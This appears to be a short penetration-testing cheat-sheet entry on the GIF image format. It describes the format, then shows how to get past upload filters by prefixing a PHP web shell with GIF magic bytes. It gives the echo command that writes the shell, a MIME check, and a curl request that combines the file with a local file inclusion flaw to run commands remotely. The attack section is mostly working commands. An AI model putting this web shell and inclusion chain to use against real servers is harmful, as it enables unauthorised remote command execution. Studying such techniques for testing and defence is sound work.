GIF

The GIF file type is a widely used image format that stands for Graphics Interchange Format. It was originally developed by CompuServe and has remained popular due to its portability, simplicity, and broad support across operating systems, browsers, and applications. A GIF file uses lossless compression based on the Lempel-Ziv-Welch (LZW) algorithm, which reduces file size without sacrificing image quality, though the format is limited to a color palette of 256 indexed colors. This makes GIFs efficient for graphics such as logos, icons, and simple illustrations, but less suitable for high-resolution images or photographs that require a wider color range. From a security perspective, GIFs are generally safe, but malformed or specially crafted files have occasionally been used to trigger vulnerabilities in poorly implemented image parsers.

Magic Bytes

If a webserver allows the uploading of .gif files (bypassing extension filters), a malicious one containing PHP code can be created, by including GIF's magic bytes at the beginning of the file content (GIF8) (bypassing content type filters).

# Create a malicious GIF file
echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif

# Check the file's MIME type
$ file --mime-type shell.gif
shell.gif: image/gif

This file on its own is harmless and would not affect normal web application. However, if we combine it with a LFI flaw, then we may be able to achieve RCE after finding its uploads directory.

# Remote command execution
curl http://<ip:port>/index.php?language=./profile_images/shell.gif&cmd=id